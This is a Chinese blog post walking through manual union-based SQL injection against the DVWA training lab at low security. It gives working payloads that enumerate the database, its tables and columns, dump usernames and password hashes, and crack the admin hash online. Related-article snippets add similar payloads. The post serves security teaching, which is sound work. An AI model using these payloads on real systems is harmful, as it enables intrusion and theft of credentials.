基于dvwa平台的手工sql注入(级别:low)

最新推荐文章于 2024-04-08 14:44:20 发布
最新推荐文章于 2024-04-08 14:44:20 发布
阅读量818 收藏 9
点赞数 3
文章标签: dvwa sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limengzhou/article/details/102533074
版权

首先进入dvwa平台的sql injection页面。

在user id中提交:1 此时在url中显示出了?id=1,数据库的信息显示到页面上了,有回显。

在url中提交id=1' 页面报错

将后面的语句通过--+注释掉,此时页面正常显示。

我们可以知道漏洞参数是:id

我们要进行的是 “字符型漏洞” 注入。

以上信息确定好后,我们可以进行联合查询。

首先使用order by字段,确定该数据表的字段数量,我们输入参数:order by 5

报错,说明字段数量不是5

以此类推,接着按此方法试验。

当order by 2 时,页面回显正常,说明字段数是2。

此时用union 注入,由于字段数是2,所以我们输入union select  1,2

由上图我们发现,在蓝色框内将1,2输出到页面中了,所以1和2的位置可以输入mysql语句,我们尝试在2的位置查询当前的数据库名,访问语句:?id=1' union select 1,database() --+

可以看到,在原来2的位置上将database()函数的结果,输出到了页面上。

获取到了数据库的名字,进而可以获取到表名,语句:

?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

可知:有两个表,分别是:guestbook,users。当然我们更感兴趣users表的内容,故接下来要查看users表的字段名。

语句:?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

注意:语句中table_name=的一串数字,是将表明进行了十六进制编码。※因为我们要尽量避免过多的字符串出现在url中,所以最好将字符串进行一下十六进制的编码。

以上就得到了users表中的字段名,如果我们想查看username和password可通过一下语句:

?id=1' union select 1,group_concat(user,0x3a,password) from users--+

其中,0x3a是字符":" 冒号的十六进制。

最后一步:在得出的结果中,我们进行一下验证吧~

我们将admin对应的密码放到cmd5中验证一下:

https://www.cmd5.com/

这就是我们的登陆密码~

实验结束啦。

奇怪的569
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWASQL Injection-----------------------low
qq_43665434的博客
02-25 294
DVWASQL Injection-----------------------low 1、初步测试 输入单引号报错 输入' and 1=1#回显正常,说明存在sql注入 输入' or 1=1#,遍历出数据库内容: 用order by测出主查询为两个字段 2、获取数据库名、用户名、版本 用union语句查询数据库名和用户名: payload_1:' union select database(),user()# payload_2:' union select 1,concat_ws('~',dat
DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
最新发布
Zichel77的博客
04-08 979
盲注,有两种主要类型,包括布尔盲注和时间盲注。
DVWA sql注入low
gclome的博客
07-05 586
如何判断sql注入是字符型还是数字型: https://www.cnblogs.com/aq-ry/p/9368619.html 下面开始进行注入 刚进入是这样的: 1.输入 ?id=1'%23 输入?id=1' and 1=1 %23 输入?id=1' and 1=2 %23 成功执行,且可以判断出为字符型注入 2.接下来判断字段数 插入代码?id=1' order by 4%23 可见字...
SQL 手动注入学习实战 —— dvwalow到impossible《low篇》
qq_40476955的博客
01-10 4891
在PHP中动态构造SQL语句的语言是query="SELECT∗FROMusersWHEREusername=".query=" SELECT * FROM users WHERE username = "._GET[“name”]; 通过控制name参数,修改执行的SQL语句,可以达到攻击的目的。
DVWASQL注入(低级)
heyingcheng的博客
11-17 2332
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入
dvwa靶场之SQL注入low等级)
Y_KolaFish_Y的博客
12-20 1119
dvwa靶场之SQL注入low等级) 第一步(判断是否可以注入) 1’ and 1=1#(正常回显) 1’ and 1=2#(无回显) 1’ or 1=1#(该表下所有数据项回显) 以上几步骤基本判断有sql注入漏洞 'union select table_schema ,table_name from information_schema.tables where table_sche...
DVWAlow级别sql注入
weixin_30349597的博客
07-13 362
将Security level设为low,在左侧列表中选择“SQL Injection”,然后在右侧的“User ID”文本框中输入不同的数字就会显示相应的用户信息。 我们首先需要判断这里所传输的参数是文本型还是数字型,分别输入3和1+2,观察它们显示的结果并不一致,因而就判断出参数类型是文本型 接下来用sqlmap注入 ,比较简单,不过要抓包抓cookie,因为这个是登陆后的...
DVWA靶场SQL注入low
qq_61975388的博客
08-17 433
DVWA靶场SQL注入实战
The used SELECT statements have a different number of columns???
weixin_30328063的博客
01-03 232
今天我们组就我一个人留守在这里修复bug了,有点小悲伤啊,他们都问我能不能hold得住啊,我当然能hold得住啊; 在看一个入库的存储过程中,在数据库运行的时候是没问题的,项目已启动,进行入库操作就是报错, The used SELECT statements have a different number of columns 顾名思义,就是你选择的列和你得到的列的烈数不一致,然后就去看存...
DVWA sql注入low级别
LRainner的博客
09-18 951
DVWA sql注入low级别 sql注入分类 数字型注入 SELECT first_name, last_name FROM users WHERE user_id = $id 字符型注入 SELECT first_name, last_name FROM users WHERE user_id = ‘$id’ 一般可以通过直接输入单引号来判断是否存在注入点 通过输入3和1+2判断注入为字符型注入,若为数字型注入,则3和1+2输出一样 字符型注入 字符型注入最关键的是如何闭合SQ
DVWA下的SQL注入
07-25
SQL
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
网络安全原理与应用:SQL手工注入.pptx
05-16
SQL手工注入一、SQL手工注入知识点任务通过SQL手工注入的方法获取admin的密码1、检查是否存在注入点2、猜解SQL查询语句的字段数3、获取数据库名称4、获取数据表名5、获取字段名6、获取字段数据SQL手工注入二、SQL...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA------sql注入low)(字符型)
qwsn
11-01 1886
================================================================================== 0x01:上low源码 ================================================================================== 0x02:sql注入low) 一...
DVWAsql注入low
m0_52923241的博客
03-12 490
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库表
DVWA-------简单的SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWAS中SQLl注入模块靶机实战(LOW等级)
JohnnyG2000的博客
01-09 2679
1、首先判断漏洞的类型 (1)在搜索框中输入1,发现存在回显,得知不是盲注 (2)分别输入1 and 1=1和1 and 1=2(嵌入sql语句),发现结果一致,得知不是整形注入 (3)输入1’,发现报错 (4)检查是否是与单引号有关的字符型注入,分别输入1’ and ‘1’ ='1和1’ and ‘1’='2,发现第二个没有回显,得知是单引号字符型注入 (5)通过输入1' order by '数字' #爆字段数 注:#为注释符,可以把后面的语句给注释掉,也可以使用其它注释符代替,例如--+,
dvwa sql注入
08-27
1. 安装和配置 DVWA:首先,需要下载 DVWA,并将其部署到本地服务器或虚拟机中。然后,根据提供的说明进行配置,设置安全级别为“低”。 2. 寻找 SQL 注入点:在 DVWA 中,通常会提供一些具有漏洞的页面。你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值